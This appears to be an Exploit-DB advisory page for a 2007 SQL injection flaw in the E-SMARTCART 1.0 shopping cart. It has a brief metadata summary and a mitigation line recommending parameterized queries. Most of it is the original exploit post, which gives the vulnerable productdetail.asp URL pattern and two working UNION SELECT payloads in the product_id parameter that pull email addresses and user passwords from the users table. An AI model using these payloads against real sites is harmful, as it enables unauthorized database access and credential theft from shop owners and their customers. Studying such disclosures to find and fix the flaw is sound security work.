E-SMARTCART 1.0 (product_id) Remote SQL Injection Vulnerability

vendor:

E-SMARTCART

by:

ajann

N/A

CVSS

HIGH

Remote SQL Injection

CWE

Product Name: E-SMARTCART

Affected Version From: Unknown

Affected Version To: Unknown

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested: Unknown

2007

E-SMARTCART 1.0 (product_id) Remote SQL Injection Vulnerability

The vulnerability allows an attacker to inject SQL queries into the product_id parameter of the productdetail.asp page, leading to unauthorized access to the database.

Mitigation:

The vendor should sanitize user inputs and use prepared statements or parameterized queries to prevent SQL injection attacks.

Source

Exploit-DB raw data:

*******************************************************************************
# Title   :  E-SMARTCART 1.0 (product_id) Remote SQL Injection Vulnerability
# Author  :  ajann
# Contact :  :(
# S.Page  :  ...
# $$      :  $49.00

*******************************************************************************

[[SQL]]]---------------------------------------------------------

http://[target]/[path]//productdetail.asp?p=1&subcat_id=-1&category_id=-1&product_id=[SQL]

Example:

//productdetail.asp?p=1&subcat_id=-1&category_id=-1&product_id=-1%20union%20select%200,email,0,0,0,0,0,0,0,0,0,0,0,0,0%20from%20users
//productdetail.asp?p=1&subcat_id=-1&category_id=-1&product_id=-1%20union%20select%200,userpassword,0,0,0,0,0,0,0,0,0,0,0,0,0%20from%20users

[[/SQL]]

"""""""""""""""""""""
# ajann,Turkey
# ...

# Im not Hacker!

# milw0rm.com [2007-01-03]